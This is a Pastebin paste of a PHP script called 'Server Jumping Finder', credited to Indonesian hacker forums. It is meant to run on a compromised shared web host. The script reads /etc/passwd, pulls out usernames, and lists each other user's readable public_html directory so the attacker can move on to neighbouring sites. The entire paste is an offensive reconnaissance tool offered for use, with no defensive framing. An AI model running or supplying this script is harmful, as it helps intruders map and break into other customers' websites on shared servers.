Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- echo '<html><head><title>'.getenv("HTTP_HOST").' - Jumping Server</title></head><body>';
- ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<font size="4" color="#000000" face="Calibri"><b>Error: Safe_mode = On</b></font>');
- set_time_limit(0);
- @$passwd = fopen('/etc/passwd','r');
- if (!$passwd)
- {
- die('<font size="4" color="#000000" face="Calibri"><b>[-] Error : Coudn`t Read /etc/passwd</b></font>');
- }
- $pub = array();
- $users = array();
- $conf = array();
- $i = 0;
- while(!feof($passwd))
- {
- $str = fgets($passwd);
- if ($i > 100){ $pos = strpos($str,':');
- $username = substr($str,0,$pos);
- $dirz = '/home/'.$username.'/public_html/';
- if (($username != '')) { if (is_readable($dirz)) { array_push($users,$username);
- array_push($pub,$dirz); }}}$i++;}
- echo '<p><font size="5" color="#008080" face="Calibri">Server Jumping Finder Version 3.0 <br></font><font size="3" color="#800000" face="Calibri">Created by uzanc | 2011 - Tangerang - Indonesia</font><font size="4" color="#000000" face="Calibri"><br><br>Dedicated To : <a href="http://code-security.com" target=_blank>www.code-security.com</a> - <a href="http://hacker-cisadane.org" target=_blank>www.hacker-cisadane.org</a></font><font size="3" color="#800000" face="Calibri"><br>Thank to : Yogyacarderlink - Indonesian Cyber - Hacker Newbie - Devilzc0de - Lumajangcrew And All Forum Hacker Indonesia</font></p><br><font size="3" color="#008080" face="Calibri"> [-]==================[ START ]==================[-] <br><br></font>';
- foreach ($users as $user)
- {
- echo "<font size='3' color='#ee0808' face='Calibri'> [+] /home/$user/public_html/</font><br/>";}
- echo "\n <font size='3' color='#008080' face='Calibri'><br>[-]==================[ FINISH ]==================[-] <br></font>\n";
- echo "\n <font size='2' color='#800000' face='Calibri'>[+] Scanners have been completed | Thank you for using this tools [+]</font>\n";
- echo '</body></html>';
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement